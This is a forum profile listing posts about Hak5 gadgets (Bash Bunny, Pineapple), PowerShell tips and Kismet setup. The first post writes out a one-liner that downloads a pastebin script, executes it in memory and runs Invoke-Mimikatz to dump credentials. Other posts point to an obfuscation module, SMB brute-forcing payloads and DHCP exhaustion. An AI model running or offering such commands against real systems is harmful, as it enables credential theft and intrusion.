Jump to content


Dedicated Members
  • Content Count

  • Joined

  • Last visited

  • Days Won


Everything posted by PoSHMagiC0de

  1. Wait, you launching powershell from within powershell? If you are, that is your issue. Depending on what you are trying to do, you will have to do it differently. If ran from the command line that will work. But if within Powershell then the below will need to be done. Start-Process "Powershell" -argumentlist "/C `"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds`"" But if you are already in Powershell, I do not see the need for the above.
  2. Try changing the "-C" to a "/C". I noticed on Windows that sometimes the "-"s break stuff like using in wmi to launch processes with command line arguments.
  3. @Just_a_User Good minds think a like....or bad minds. Depends on your perspective. 🙂
  4. Okay, you can grab screenshots and video. Okay. Here is the thing...can this thing do playback? Now that would be cool. Imagine being able to cover your hack with a generic replacement view..kinda like the spies do with the static feed to video cameras of facilities they are breaking into. Why would you want that? Well, to hide your hack if you are emulating their screen like through VNC or what not. Hide what the BB is doing. Just some ideas. Would be cool if BB could communicate back to it to initiate screen hide. If the device than pickup screen queues to do stuff then that would be cool too. I am just trying to squeeze out ideas for this thing that will entice me to get one.
  5. You can or you can ssh into it and work on the command line if you are L33t enough. It has an internal web interface on the Pineapple. It is not served from their site. I believe the dashboard does connect to their portal which just to pull down news.
  6. Hmm, I sent Darren awhile back when he did a vlog on the wallpaper changer a p/Invoke version of it that would instantaneously change the wallpaper. His version changed the same regkey but then looked through a command a bunch of times to get it to apply now. The version I am going to post in pieces will do it the minute it is ran. First, the unmanaged function that is part of windows API is: public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni) This changes parameters in Windows and adds the changes to the appropriate files. The action parameter is what you are doing. 20 is changing wallpaper. Parameter after that I forget but for setting wallpaper it is always 0. Then the lvparam will be a string to the file you want to be the wallpaper followed by parameter to save to ini file and/or send changes to system (1 -bor 2). They are binary or'ed because we want both set. So, below is how I did it all in Powershell. #First, here is the signature for the unmanaged command. $sig = "[DllImport(`"user32.dll`", SetLastError = true, CharSet = CharSet.Auto)]public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);" # Next, we add it as a type, give it a name (if you want to use it straight out) and a namespace to separate it from the rest of our Posh session. $SetWallpaper = add-type -MemberDefinition $sig -Name SetWallpaper -Namespace Win32Functions -PassThru # Now, if you want to save what your old wallpaper was then the bottom will do it. $oldwallpaper = (Get-ItemProperty -Path "HKCU:\\Control Panel\Desktop" -Name Wallpaper).Wallpaper #Place path for new wallpaper in variable or skip this and use it right out where the variable is used at. $newpaper = "c:\somewhere\something.bmp" $SetWallpaper::SystemParametersInfo(20, 0, $newpaper, (0x01 -bor 0x02)) # If you were going to 1 line this then there is some prep work. First, base64 the sig. This makes it easier to use. $enc = [System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes($sig))) # Now your command can be this on 1 line. powershell -C "$sig='W0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIFNldExhc3RFcnJvciA9IHRydWUsIENoYXJTZXQgPSBDaGFyU2V0LkF1dG8pXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBTeXN0ZW1QYXJhbWV0ZXJzSW5mbyhpbnQgdUFjdGlvbiwgaW50IHVQYXJhbSwgc3RyaW5nIGxwdlBhcmFtLCBpbnQgZnVXaW5JbmkpOw==';$SW=add-type -MemberDefinition ([System.Text.Encoding]::ASCII.GetString(([System.Convert]::FromBase64String($sig)))) -Name ShowWall -Namespace Win32 -passthru;$SW::SystemParametersInfo(20, 0, 'C:\somewhere\something.bmp', (0x01 -bor 0x02))" That base64line is what was in $enc. You could also just put it inside the decide command instead of in a variable first. Enjoy.
  7. Yeah..... I read through this thread twice and still got lost. If I read it correctly from the original question, it is asked why Hak5 products are tied to their servers. Well, they are not. The BashBunny, RUbbr ducky, and all their stuff does not require you to speak back to their server. If you want new firmware and stuff, you can download it and install it but usage does not require..nor does it..talk back to Hak5. The Cloud C2 might and if it does, it will be for product registration since that is one of their only products that has a free and paid tier so it has licenses. So, I do not know of any Hak5 hardware that has a mandatory umbilical back to them. Support you get is all manual. Manual calling/emailing them and manually downloading and installing updates. Hmm, I think the Pineapple speaks back to their server but only to return if there are updates and I believe there is an option to turn that off.
  8. I parsed through the Go code real quick for Bettercap and see there is no output except to the console for gps data. Not even a rest api for it else I would suggest building a service in whatever language you want that can hit the rest api of bettercap to query that data on a time interval. For something like this, kismet might be a better choice. Setup kismet as sensor on your remote devices that can communicate to a kismet instance that is the server. Though, I wouldn't shoot that openly across the inet. Maybe create VPN or SSH tunnels back to server and server it through there? Have the kismet listener listening on local host only for the ssh tunnel or the private vpn network for vpn tunnel. You get it.
  9. Hmm, people always put the BB into the hacking category. I actually been using mine more for admin stuff. When we get new customers, a lot of the time they do not have a domain or anything setup so initial switching and stuff takes me going to each machine to run a few things and stuff since there is no real network access. Usually that means for in the beginning creating a local admin I know and giving it local admin remote rights so I can do things remotely or installing AV and remoting software, etc. I have even used it with my partner here where she she is going out to a site and need her to run some things but she is oblivious to powershell and what I want her to do so I script it on the bunny and tell her to just put it in this machine while signed in as admin and it does it for her. So, I think we should reclassify the bunny as more of an admin tool or an "Enhanced Technician Device". The purposes I listed above is the real reason I worked on the BBTPS.
  10. It is indeed not a good idea to move the switch while the BB is working. With that said, this is only precautionary since most payloads do not require you to mess with the switch while they run and doing so will only change mid range what switch folder to look payloads. Example. If you move the switch from position 1 to 2 before the BB boots up to run payload.txt then payload.txt from switch 2. The switch position also dictates with get_switch returns so moving it mid payload when the payload is not designed for it may cause it to look for stuff in another switch folder. Hope-eye is a payload invented to let you know when it has passed its boot phase and entered the payload phase and is now safe to move the switch to select a payload pre-programmed. Example is it marks what switch position you currently are in and then begins an interval of light colors representing payloads leaving 1 second wait to give you time to move switch when payload you want comes up. It looks after the wait for a change in switch position. If changed, that payload is ran but it uses the old switch position it saved to find all the stuff it needs in the current switch folder. Lets just say the way it is done is safe.
  11. The issue with the BYOD is right now if they did offer something it would just be reverse shell into the device. The reason the Pineapple has more options mainly because it has an API that they can talk to and they already have the code for the interface so I can see it just being a reverse tunnel with the C2 speaking to the API. So...I would say if you want the C2 to support your device or something on your device...give Hak5 something to interface with like an app. Now, say you want to interface with the Raspberry pi version of Kismet which has an API. That would give them some target. Just having it connect to a Pi would be the same as just setting up your own reverse SSH since Hak5 has no product for the Raspberry Pi except for the C2 server itself.
  12. I believe port 443 is for you to connect to the C2 and the SSH port 2022 is for the devices to connect back.
  13. If I do not compile my go apps in the alpine docker container I get the same error. Here is the fix below. Build a new container with this one additional line. RUN mkdir /lib64 && ln -s /lib/libc.musl-x86_64.so.1 /lib64/ld-linux-x86-64.so.2 Enjoy.
  14. AV will trigger because the payloads that are copied to the BB are tagged as bad by AVs. Mimikatz is a password grabber bit is a payload for the BB to get passwords. so, yelp it will trigger bit if you are using the updater from the official site then it will just be copying them to the BB. If you are worried, you can always do the updating manually.
  15. Well, I guess this was coming. Google wants to break ad blockers in Chrome and do not care if they piss off their users. Looks like I am going full blown firefox. https://www.forbes.com/sites/kateoflahertyuk/2019/05/30/google-just-gave-2-billion-chrome-users-a-reason-to-switch-to-firefox/amp/
  16. This is a Powershell module I have been using for a while now. Figured I will share it here. The git readme is thorough enough to explain how it works. Cool features it has is if you are planning to run your finished script as a command from the command prompt then it warns if you are over the character limit. https://github.com/danielbohannon/Invoke-Obfuscation
  17. Awesome. I would only add 1 thing. A require_tool impacket. Smbconnection requires impacket.
  18. In the payload.txt put in: export DEFAULT_DELAY=XXXX I do not know if that will work and was hoping one of the Hak5 folks would chime in with a yes or no if it is possible since I do not see it in any of their documentation of the Bunny and they wrote the Q/Quack command, but do not think that is going to happen. After looking through all the above, I am seeing you are going to need to do some reading up on what the Bash Bunny is and maybe mess around with a linux virtual machine. The BB is a Linux machine in a USB stick.
  19. Yeah, I have been having issues getting my not-domain joined, updated Windows 10 machine to take SMB connections into it unless I screw with the token setting in registry. So, I assume this is an enterprise payload unless the home user/friend you are picking on is knowledgeable, have Win10 pro and setup a home domain or edited his machine to behave as a domain joined machine. I was going to work on an impacket implemented payload (use the actual library to make my own suing smbconnection library to spawn through connections. You could even skip the nmap scan since SMBConnection will throw an error if it cannot connect. Since there is a fast PoC out there already, I am going to move on to working back on my own tool since I have a week off this week. Going to use Go on the BB. Anyway, yeah, it is cool he got MM going on the BB but I knew there would be overhead.
  20. Remember that any other features and payloads can be added on your self to be ran once/if access is gained. The base payload should stay as is and just take improvements to how it works. Hmm, how fast does this payload spin up with metasploit? Wondering if the same bruting could be done with impacket's smbclient?
  21. Nope. I mean there might be an environment variable on the bunny you can set. Or..it may not exist in the Bash Bunny version.
  22. Bash. The commandline shell for most Linux systems like Bat files for Windows.
  23. Not really. no need for it since it is the Bash Bunny. You can probably do something like that with BashFu. Maybe they turned it into an environment variable on the Bash Bunny you initialize.
  24. Hmm, just started trying it out and doesn't work half bad. I only made a web forensics image from the kali image but plan on doing one for wifi abd testing out the privilege flag to see if it works for direct access. Also, to push the net stack I may try yersinia commandline version. Yersinia sometimes crashes my net stack when I run bare metal doing dhcp exhaustion. Lets see if it breaks faster in a docker container hehe.
  25. Hmm, do not know for sure but that maybe a rubber duck specific thing. Maybe someone can confirm @Foxtrot.
  • Create New...